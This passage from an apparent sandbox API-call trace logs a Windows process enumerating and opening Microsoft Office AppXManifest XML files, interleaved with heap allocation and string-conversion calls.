dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.144] AreFileApisANSI () returned 1 [0099.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 105 [0099.144] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x839bc0c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x839bc0c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed)) returned 1 [0099.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.144] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.144] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.144] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x841a1e52, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", cAlternateFileName="APF00A~1.XML")) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0099.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46588 [0099.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0099.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cb90 [0099.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46588 | out: hHeap=0x20000) returned 1 [0099.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0099.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0099.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0099.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0099.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0099.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x891b8 [0099.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88d30 [0099.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x891b8 | out: hHeap=0x20000) returned 1 [0099.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88d30 | out: hHeap=0x20000) returned 1 [0099.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.145] AreFileApisANSI () returned 1 [0099.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0099.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.146] AreFileApisANSI () returned 1 [0099.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 105 [0099.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.146] GetFileType (hFile=0x368) returned 0x1 [0099.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.146] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.146] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.146] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.147] CloseHandle (hObject=0x368) returned 1 [0099.147] AreFileApisANSI () returned 1 [0099.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 105 [0099.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.147] GetFileType (hFile=0x368) returned 0x1 [0099.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.147] CloseHandle (hObject=0x368) returned 1 [0099.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.148] AreFileApisANSI () returned 1 [0099.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 105 [0099.149] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x841a1e52, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5aa)) returned 1 [0099.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.149] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.149] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.149] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x831d63af, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x834ab261, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", cAlternateFileName="APPXMA~2.XML")) returned 1 [0099.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0099.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0099.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0099.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0099.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0099.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d370 [0099.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0099.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0099.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0099.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0099.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0099.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0099.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x892a0 [0099.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x890d0 [0099.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x892a0 | out: hHeap=0x20000) returned 1 [0099.150] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.150] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.150] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.150] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x890d0 | out: hHeap=0x20000) returned 1 [0099.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.150] AreFileApisANSI () returned 1 [0099.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0099.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.150] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.150] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.150] AreFileApisANSI () returned 1 [0099.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 105 [0099.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.151] GetFileType (hFile=0x368) returned 0x1 [0099.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.151] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.151] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.151] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.151] CloseHandle (hObject=0x368) returned 1 [0099.151] AreFileApisANSI () returned 1 [0099.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.151] RtlAllocateHeap 